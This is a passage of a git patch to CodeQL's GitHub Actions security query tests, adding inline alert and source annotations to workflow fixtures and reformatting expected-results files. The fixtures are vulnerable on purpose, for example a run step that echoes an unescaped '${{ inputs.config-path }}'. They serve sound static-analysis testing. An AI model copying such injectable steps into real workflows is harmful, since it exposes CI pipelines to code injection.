From 4d2e16e97bfffd4a6337de1f6c433cb6dd15617d Mon Sep 17 00:00:00 2001 From: Owen Mansel-Chan Date: Wed, 10 Jun 2026 22:59:00 +0200 Subject: [PATCH] Actions --- .../.github/workflows/reusable_workflow.yml | 10 +- .../Models/CompositeActionsSinks.expected | 6 +- .../Models/CompositeActionsSinks.qlref | 3 +- .../Models/CompositeActionsSources.expected | 12 +- .../Models/CompositeActionsSources.qlref | 4 +- .../Models/CompositeActionsSummaries.expected | 4 +- .../Models/CompositeActionsSummaries.qlref | 4 +- .../Models/ReusableWorkflowsSinks.expected | 4 +- .../Models/ReusableWorkflowsSinks.qlref | 4 +- .../Models/ReusableWorkflowsSources.expected | 4 +- .../Models/ReusableWorkflowsSources.qlref | 4 +- .../ReusableWorkflowsSummaries.expected | 4 +- .../Models/ReusableWorkflowsSummaries.qlref | 4 +- .../query-tests/Models/action1/action.yml | 16 +- .../CWE-074/.github/workflows/output1.yml | 8 +- .../CWE-074/.github/workflows/output2.yml | 18 +- .../CWE-074/OutputClobberingHigh.expected | 18 +- .../CWE-074/OutputClobberingHigh.qlref | 3 +- .../.github/workflows/artifactpoisoning51.yml | 4 +- .../.github/workflows/artifactpoisoning52.yml | 4 +- .../.github/workflows/artifactpoisoning53.yml | 4 +- .../CWE-077/.github/workflows/path1.yml | 18 +- .../CWE-077/.github/workflows/test10.yml | 4 +- .../CWE-077/.github/workflows/test11.yml | 4 +- .../CWE-077/.github/workflows/test12.yml | 8 +- .../CWE-077/.github/workflows/test13.yml | 4 +- .../CWE-077/.github/workflows/test14.yml | 4 +- .../CWE-077/.github/workflows/test15.yml | 4 +- .../CWE-077/.github/workflows/test16.yml | 8 +- .../CWE-077/.github/workflows/test2.yml | 4 +- .../CWE-077/.github/workflows/test3.yml | 4 +- .../CWE-077/.github/workflows/test4.yml | 36 +- .../CWE-077/.github/workflows/test5.yml | 4 +- .../CWE-077/.github/workflows/test6.yml | 12 +- .../CWE-077/.github/workflows/test7.yml | 4 +- .../CWE-077/.github/workflows/test8.yml | 8 +- .../CWE-077/.github/workflows/test9.yml | 4 +- .../CWE-077/EnvPathInjectionCritical.expected | 12 +- .../CWE-077/EnvPathInjectionCritical.qlref | 3 +- .../CWE-077/EnvPathInjectionMedium.expected | 2 +- .../CWE-077/EnvPathInjectionMedium.qlref | 3 +- .../CWE-077/EnvVarInjectionCritical.expected | 74 ++-- .../CWE-077/EnvVarInjectionCritical.qlref | 3 +- .../CWE-077/EnvVarInjectionMedium.expected | 2 +- .../CWE-077/EnvVarInjectionMedium.qlref | 3 +- .../.github/workflows/comment_issue.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 4 +- .../CWE-078/CommandInjectionCritical.qlref | 3 +- .../CWE-078/CommandInjectionMedium.expected | 2 +- .../CWE-078/CommandInjectionMedium.qlref | 3 +- .../.github/workflows/arg_injection.yml | 26 +- .../ArgumentInjectionCritical.expected | 26 +- .../CWE-088/ArgumentInjectionCritical.qlref | 3 +- .../CWE-088/ArgumentInjectionMedium.expected | 2 +- .../CWE-088/ArgumentInjectionMedium.qlref | 3 +- .../.github/actions/action1/action.yml | 2 +- .../.github/actions/action3/action.yml | 2 +- .../.github/actions/action4/action.yml | 2 +- .../.github/actions/action5/action.yml | 6 +- .../.github/actions/action6/action.yml | 2 +- .../.github/actions/action7/action.yml | 8 +- .../.github/actions/clone-repo/action.yaml | 2 +- .../external/ultralytics/actions/action.yaml | 4 +- .../.github/workflows/argus_case_study.yml | 4 +- .../.github/workflows/artifactpoisoning1.yml | 4 +- .../.github/workflows/artifactpoisoning2.yml | 4 +- .../.github/workflows/artifactpoisoning3.yml | 4 +- .../.github/workflows/artifactpoisoning4.yml | 4 +- .../.github/workflows/artifactpoisoning5.yml | 4 +- .../.github/workflows/artifactpoisoning6.yml | 6 +- .../.github/workflows/artifactpoisoning7.yml | 4 +- .../.github/workflows/artifactpoisoning8.yml | 4 +- .../.github/workflows/changed-files.yml | 12 +- .../.github/workflows/comment_issue.yml | 14 +- .../workflows/comment_issue_newline.yml | 6 +- .../workflows/composite-action-caller-3.yml | 6 +- .../workflows/composite-action-caller-4.yml | 4 +- .../CWE-094/.github/workflows/cross3.yml | 6 +- .../CWE-094/.github/workflows/discussion.yml | 4 +- .../.github/workflows/discussion_comment.yml | 6 +- .../.github/workflows/publishResults.yml | 4 +- .../.github/workflows/reusable-workflow.yml | 10 +- .../CWE-094/.github/workflows/gollum.yml | 8 +- .../workflows/image_link_generator.yml | 4 +- .../CWE-094/.github/workflows/inter-job0.yml | 4 +- .../CWE-094/.github/workflows/inter-job1.yml | 4 +- .../CWE-094/.github/workflows/inter-job2.yml | 4 +- .../CWE-094/.github/workflows/inter-job4.yml | 4 +- .../CWE-094/.github/workflows/inter-job5.yml | 2 +- .../CWE-094/.github/workflows/issues.yaml | 16 +- .../CWE-094/.github/workflows/json_wrap.yml | 4 +- .../CWE-094/.github/workflows/level0.yml | 4 +- .../CWE-094/.github/workflows/level1.yml | 2 +- .../.github/workflows/priv_pull_request.yml | 2 +- .../.github/workflows/pull_request_review.yml | 16 +- .../workflows/pull_request_review_comment.yml | 16 +- .../.github/workflows/pull_request_target.yml | 16 +- .../CWE-094/.github/workflows/push.yml | 20 +- .../workflows/push_and_workflow_dispatch.yml | 20 +- .../.github/workflows/reusable-workflow-1.yml | 10 +- .../.github/workflows/reusable-workflow-2.yml | 10 +- .../workflows/reusable-workflow-caller-1.yml | 2 +- .../workflows/reusable-workflow-caller-2.yml | 2 +- .../workflows/reusable-workflow-caller-3.yml | 2 +- .../CWE-094/.github/workflows/self_needs.yml | 6 +- .../CWE-094/.github/workflows/simple1.yml | 4 +- .../CWE-094/.github/workflows/simple2.yml | 4 +- .../CWE-094/.github/workflows/simple3.yml | 4 +- .../.github/workflows/slash_command2.yml | 2 +- .../CWE-094/.github/workflows/test.yml | 4 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test10.yml | 12 +- .../CWE-094/.github/workflows/test11.yml | 6 +- .../CWE-094/.github/workflows/test12.yml | 2 +- .../CWE-094/.github/workflows/test13.yml | 8 +- .../CWE-094/.github/workflows/test14.yml | 16 +- .../CWE-094/.github/workflows/test15.yml | 16 +- .../CWE-094/.github/workflows/test16.yml | 8 +- .../CWE-094/.github/workflows/test17.yml | 16 +- .../CWE-094/.github/workflows/test18.yml | 4 +- .../CWE-094/.github/workflows/test19.yml | 84 ++--- .../CWE-094/.github/workflows/test2.yml | 8 +- .../CWE-094/.github/workflows/test20.yml | 2 +- .../CWE-094/.github/workflows/test21.yml | 6 +- .../CWE-094/.github/workflows/test24.yml | 4 +- .../CWE-094/.github/workflows/test25.yml | 4 +- .../CWE-094/.github/workflows/test26.yml | 6 +- .../CWE-094/.github/workflows/test27.yml | 4 +- .../CWE-094/.github/workflows/test29.yml | 2 +- .../CWE-094/.github/workflows/test3.yml | 4 +- .../CWE-094/.github/workflows/test4.yml | 6 +- .../CWE-094/.github/workflows/test5.yml | 2 +- .../CWE-094/.github/workflows/test7.yml | 8 +- .../CWE-094/.github/workflows/test8.yml | 4 +- .../CWE-094/.github/workflows/test9.yml | 12 +- .../.github/workflows/untrusted_checkout1.yml | 4 +- .../.github/workflows/workflow_run.yml | 16 +- .../workflows/workflow_run_branches1.yml | 2 +- .../workflows/workflow_run_branches2.yml | 2 +- .../workflows/workflow_run_branches3.yml | 2 +- .../workflows/workflow_run_branches4.yml | 2 +- .../workflows/workflow_run_branches5.yml | 2 +- .../CWE-094/CodeInjectionCritical.expected | 334 +++++++++--------- .../CWE-094/CodeInjectionCritical.qlref | 3 +- .../CWE-094/CodeInjectionMedium.expected | 118 +++---- .../CWE-094/CodeInjectionMedium.qlref | 3 +- .../CWE-1395/.github/workflows/test1.yml | 4 +- .../CWE-1395/UseOfKnownVulnerableAction.qlref | 4 +- .../CWE-200/.github/workflows/test1.yml | 2 +- .../CWE-200/SecretExfiltration.expected | 4 +- .../Security/CWE-200/SecretExfiltration.qlref | 4 +- .../CWE-275/.github/workflows/perms1.yml | 2 +- .../CWE-275/.github/workflows/perms10.yml | 2 +- .../CWE-275/.github/workflows/perms2.yml | 2 +- .../CWE-275/.github/workflows/perms5.yml | 2 +- .../CWE-275/.github/workflows/perms6.yml | 2 +- .../CWE-275/.github/workflows/perms7.yml | 2 +- .../CWE-275/.github/workflows/perms8.yml | 2 +- .../CWE-275/.github/workflows/perms9.yml | 2 +- .../CWE-275/MissingActionsPermissions.qlref | 4 +- .../CWE-284/.github/workflows/test1.yml | 16 +- .../CodeExecutionOnSelfHostedRunner.qlref | 4 +- .../CWE-285/.github/workflows/test1.yml | 2 +- .../CWE-285/ImproperAccessControl.qlref | 4 +- .../workflows/secrets-in-artifacts.yml | 10 +- .../CWE-312/.github/workflows/test1.yml | 10 +- .../CWE-312/ExcessiveSecretsExposure.qlref | 4 +- .../Security/CWE-312/SecretsInArtifacts.qlref | 4 +- .../CWE-312/UnmaskedSecretExposure.qlref | 4 +- .../.github/workflows/code_injection1.yml | 2 +- .../.github/workflows/direct_cache1.yml | 4 +- .../.github/workflows/direct_cache2.yml | 4 +- .../.github/workflows/direct_cache3.yml | 4 +- .../.github/workflows/direct_cache4.yml | 4 +- .../.github/workflows/direct_cache5.yml | 4 +- .../.github/workflows/direct_cache6.yml | 4 +- .../.github/workflows/poisonable_step1.yml | 10 +- .../.github/workflows/poisonable_step2.yml | 4 +- .../.github/workflows/poisonable_step3.yml | 2 +- .../.github/workflows/poisonable_step4.yml | 2 +- .../.github/workflows/poisonable_step5.yml | 4 +- .../CachePoisoningViaCodeInjection.expected | 4 +- .../CachePoisoningViaCodeInjection.qlref | 4 +- .../CachePoisoningViaDirectCache.expected | 14 +- .../CachePoisoningViaDirectCache.qlref | 4 +- .../CachePoisoningViaPoisonableStep.expected | 16 +- .../CachePoisoningViaPoisonableStep.qlref | 4 +- .../CWE-367/.github/workflows/comment.yml | 6 +- .../CWE-367/.github/workflows/test0.yml | 6 +- .../CWE-367/.github/workflows/test4.yml | 4 +- .../CWE-367/.github/workflows/test5.yml | 8 +- .../CWE-367/.github/workflows/test6.yml | 10 +- .../UntrustedCheckoutTOCTOUCritical.expected | 22 +- .../UntrustedCheckoutTOCTOUCritical.qlref | 3 +- .../CWE-367/UntrustedCheckoutTOCTOUHigh.qlref | 3 +- .../CWE-571/.github/workflows/test1.yml | 22 +- .../CWE-571/.github/workflows/test2.yml | 22 +- .../ExpressionIsAlwaysTrueCritical.qlref | 3 +- .../CWE-571/ExpressionIsAlwaysTrueHigh.qlref | 3 +- .../actions/dangerous-git-checkout/action.yml | 2 +- .../actions/download-artifact-2/action.yaml | 2 +- .../actions/download-artifact/action.yaml | 2 +- .../.github/actions/unpinned-tag/action.yml | 2 +- .../workflows/actor_trusted_checkout.yml | 4 +- .../workflows/artifactpoisoning101.yml | 6 +- .../.github/workflows/artifactpoisoning11.yml | 4 +- .../.github/workflows/artifactpoisoning12.yml | 4 +- .../.github/workflows/artifactpoisoning21.yml | 6 +- .../.github/workflows/artifactpoisoning22.yml | 6 +- .../.github/workflows/artifactpoisoning31.yml | 4 +- .../.github/workflows/artifactpoisoning32.yml | 4 +- .../.github/workflows/artifactpoisoning33.yml | 4 +- .../.github/workflows/artifactpoisoning34.yml | 4 +- .../.github/workflows/artifactpoisoning41.yml | 4 +- .../.github/workflows/artifactpoisoning42.yml | 4 +- .../.github/workflows/artifactpoisoning71.yml | 6 +- .../.github/workflows/artifactpoisoning81.yml | 4 +- .../.github/workflows/artifactpoisoning91.yml | 4 +- .../.github/workflows/artifactpoisoning92.yml | 6 +- .../.github/workflows/artifactpoisoning96.yml | 2 +- .../CWE-829/.github/workflows/auto_ci.yml | 18 +- .../CWE-829/.github/workflows/dependabot2.yml | 2 +- .../CWE-829/.github/workflows/dependabot3.yml | 4 +- .../TestRepo/.github/workflows/reusable.yml | 4 +- .../CWE-829/.github/workflows/gitcheckout.yml | 4 +- .../issue_comment_3rd_party_action.yml | 6 +- .../workflows/issue_comment_direct.yml | 10 +- .../workflows/issue_comment_heuristic.yml | 4 +- .../workflows/issue_comment_octokit.yml | 12 +- .../workflows/issue_comment_octokit2.yml | 8 +- .../workflows/label_trusted_checkout1.yml | 4 +- .../workflows/label_trusted_checkout2.yml | 6 +- .../CWE-829/.github/workflows/level0.yml | 10 +- .../CWE-829/.github/workflows/mend.yml | 4 +- .../CWE-829/.github/workflows/poc.yml | 8 +- .../CWE-829/.github/workflows/poc2.yml | 6 +- .../CWE-829/.github/workflows/poc3.yml | 2 +- .../CWE-829/.github/workflows/pr-workflow.yml | 44 +-- .../workflows/priv_pull_request_checkout.yml | 2 +- .../.github/workflows/resolve-args.yml | 2 +- .../.github/workflows/reusable_local.yml | 4 +- .../CWE-829/.github/workflows/test10.yml | 4 +- .../CWE-829/.github/workflows/test11.yml | 4 +- .../CWE-829/.github/workflows/test12.yml | 2 +- .../CWE-829/.github/workflows/test13.yml | 4 +- .../CWE-829/.github/workflows/test14.yml | 4 +- .../CWE-829/.github/workflows/test15.yml | 4 +- .../CWE-829/.github/workflows/test17.yml | 6 +- .../CWE-829/.github/workflows/test18.yml | 6 +- .../CWE-829/.github/workflows/test22.yml | 2 +- .../CWE-829/.github/workflows/test25.yml | 4 +- .../CWE-829/.github/workflows/test27.yml | 4 +- .../CWE-829/.github/workflows/test28.yml | 2 +- .../CWE-829/.github/workflows/test29.yml | 4 +- .../CWE-829/.github/workflows/test3.yml | 2 +- .../CWE-829/.github/workflows/test4.yml | 2 +- .../CWE-829/.github/workflows/test7.yml | 12 +- .../CWE-829/.github/workflows/test8.yml | 2 +- .../CWE-829/.github/workflows/test9.yml | 2 +- .../.github/workflows/unpinned_tags.yml | 6 +- .../.github/workflows/untrusted_checkout.yml | 8 +- .../.github/workflows/untrusted_checkout2.yml | 2 +- .../.github/workflows/untrusted_checkout3.yml | 2 +- .../.github/workflows/untrusted_checkout4.yml | 8 +- .../workflow_run_untrusted_checkout.yml | 4 +- .../workflow_run_untrusted_checkout_2.yml | 4 +- .../ArtifactPoisoningCritical.expected | 38 +- .../CWE-829/ArtifactPoisoningCritical.qlref | 4 +- .../CWE-829/ArtifactPoisoningMedium.expected | 2 +- .../CWE-829/ArtifactPoisoningMedium.qlref | 4 +- .../ArtifactPoisoningPathTraversal.qlref | 4 +- .../Security/CWE-829/UnpinnedActionsTag.qlref | 3 +- .../UntrustedCheckoutCritical.expected | 80 ++--- .../CWE-829/UntrustedCheckoutCritical.qlref | 3 +- .../CWE-829/UntrustedCheckoutHigh.qlref | 3 +- .../CWE-829/UntrustedCheckoutMedium.qlref | 3 +- .../CWE-829/UnversionedImmutableAction.qlref | 3 +- .../CWE-918/.github/workflows/test.yml | 2 +- .../Security/CWE-918/RequestForgery.expected | 4 +- .../Security/CWE-918/RequestForgery.qlref | 3 +- .../.github/workflows/malformed.yml | 2 +- .../query-tests/SyntaxError/SyntaxError.qlref | 3 +- .../workflows/defaultable_workflow.yml | 2 +- .../UnnecessaryUseOfAdvancedConfig.qlref | 3 +- 284 files changed, 1181 insertions(+), 1157 deletions(-) diff --git a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml index c2e9e17160d..de43f610827 100644 --- a/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml +++ b/actions/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml @@ -3,14 +3,14 @@ name: Reusable workflow example on: workflow_call: inputs: - config-path: + config-path: # $ Source[actions/reusable-workflow-sinks] Source[actions/reusable-workflow-summaries] required: true type: string outputs: workflow-output1: - value: ${{ jobs.job1.outputs.job-output1 }} + value: ${{ jobs.job1.outputs.job-output1 }} # $ Alert[actions/reusable-workflow-summaries] workflow-output2: - value: ${{ jobs.job1.outputs.job-output2 }} + value: ${{ jobs.job1.outputs.job-output2 }} # $ Alert[actions/reusable-workflow-sources] secrets: token: required: true @@ -26,9 +26,9 @@ jobs: env: CONFIG_PATH: ${{ inputs.config-path }} run: | - echo ${{ inputs.config-path }} + echo ${{ inputs.config-path }} # $ Alert[actions/reusable-workflow-sinks] echo "::set-output name=step-output::$CONFIG_PATH" - name: Get changed files id: step2 - uses: tj-actions/changed-files@v40 + uses: tj-actions/changed-files@v40 # $ Source[actions/reusable-workflow-sources] diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected index 0a5bfe433e9..33f7bd28de6 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.expected @@ -1,3 +1,6 @@ +#select +| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | +| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:28:18:28:43 | inputs.who-to-greet | provenance | | | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | provenance | | @@ -10,6 +13,3 @@ nodes | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | semmle.label | steps.replace.outputs.value | | action1/action.yml:35:25:35:50 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:32:18:32:51 | steps.replace.outputs.value | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:32:18:32:51 | steps.replace.outputs.value | Sink | -| action1/action.yml:35:25:35:50 | inputs.who-to-greet | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:35:25:35:50 | inputs.who-to-greet | Sink | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref index e5cb225ed24..d0379762036 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSinks.qlref @@ -1 +1,2 @@ -Models/CompositeActionsSinks.ql +query: Models/CompositeActionsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected index 3be74bb8bf1..3f13be734e2 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.expected @@ -1,3 +1,9 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | +| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | edges | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | provenance | | @@ -13,9 +19,3 @@ nodes | action1/action.yml:44:7:48:70 | Run Step: source [tainted] | semmle.label | Run Step: source [tainted] | | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | semmle.label | steps.changed-files.outputs.all_changed_files | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:41:30:41:55 | inputs.who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:42:7:44:4 | Uses Step: changed-files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | -| action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | action1/action.yml:48:19:48:70 | steps.changed-files.outputs.all_changed_files | action1/action.yml:14:13:14:46 | steps.source.outputs.tainted | Source | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref index 3b833d66912..fcdfec84bb7 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSources.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSources.ql - +query: Models/CompositeActionsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected index 067edb68bb1..43db3e5afa2 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.expected @@ -1,3 +1,5 @@ +#select +| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | edges | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:41:30:41:55 | inputs.who-to-greet | provenance | | | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | provenance | | @@ -8,5 +10,3 @@ nodes | action1/action.yml:37:7:42:4 | Run Step: reflector [reflected] | semmle.label | Run Step: reflector [reflected] | | action1/action.yml:41:30:41:55 | inputs.who-to-greet | semmle.label | inputs.who-to-greet | subpaths -#select -| action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | action1/action.yml:4:3:4:14 | input who-to-greet | action1/action.yml:11:13:11:52 | steps.reflector.outputs.reflected | Summary | diff --git a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref index ea9b7a304e6..7508e12c981 100644 --- a/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/CompositeActionsSummaries.qlref @@ -1,2 +1,2 @@ -Models/CompositeActionsSummaries.ql - +query: Models/CompositeActionsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected index 18e9f0186df..3a496c7751e 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | edges | .github/workflows/calling_workflow.yml:12:5:15:2 | Job: call2 [workflow-output1] | .github/workflows/calling_workflow.yml:35:20:35:62 | needs.call2.outputs.workflow-output1 | provenance | | | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | @@ -20,5 +22,3 @@ nodes | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:29:17:29:41 | inputs.config-path | Sink | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref index fa8344d4bf9..8cc9921223a 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSinks.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSinks.ql - +query: Models/ReusableWorkflowsSinks.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected index c76034f74d4..c9132156dad 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | edges | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | provenance | | | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output2] | provenance | | @@ -8,5 +10,3 @@ nodes | .github/workflows/reusable_workflow.yml:23:21:23:63 | steps.step2.outputs.all_changed_files | semmle.label | steps.step2.outputs.all_changed_files | | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | semmle.label | Uses Step: step2 | subpaths -#select -| .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | .github/workflows/reusable_workflow.yml:31:9:33:43 | Uses Step: step2 | .github/workflows/reusable_workflow.yml:13:17:13:52 | jobs.job1.outputs.job-output2 | Source | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref index fe4299bdba4..4a35c574ad5 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSources.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSources.ql - +query: Models/ReusableWorkflowsSources.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected index 8589d82d825..2a6c4269d52 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.expected @@ -1,3 +1,5 @@ +#select +| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | edges | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | provenance | | | .github/workflows/reusable_workflow.yml:22:7:24:4 | Job outputs node [job-output1] | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | provenance | | @@ -12,5 +14,3 @@ nodes | .github/workflows/reusable_workflow.yml:25:9:31:6 | Run Step: step1 [step-output] | semmle.label | Run Step: step1 [step-output] | | .github/workflows/reusable_workflow.yml:27:25:27:49 | inputs.config-path | semmle.label | inputs.config-path | subpaths -#select -| .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | .github/workflows/reusable_workflow.yml:6:7:6:17 | input config-path | .github/workflows/reusable_workflow.yml:11:17:11:52 | jobs.job1.outputs.job-output1 | Summary | diff --git a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref index 3547c8a4d07..7655b5f8010 100644 --- a/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref +++ b/actions/ql/test/query-tests/Models/ReusableWorkflowsSummaries.qlref @@ -1,2 +1,2 @@ -Models/ReusableWorkflowsSummaries.ql - +query: Models/ReusableWorkflowsSummaries.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Models/action1/action.yml b/actions/ql/test/query-tests/Models/action1/action.yml index 787fb9f588b..4780a1529f8 100644 --- a/actions/ql/test/query-tests/Models/action1/action.yml +++ b/actions/ql/test/query-tests/Models/action1/action.yml @@ -1,17 +1,17 @@ name: 'Hello World' description: 'Greet someone' inputs: - who-to-greet: # id of input + who-to-greet: # id of input # $ Source[actions/composite-action-sinks] Source[actions/composite-action-summaries] description: 'Who to greet' required: true default: 'World' outputs: 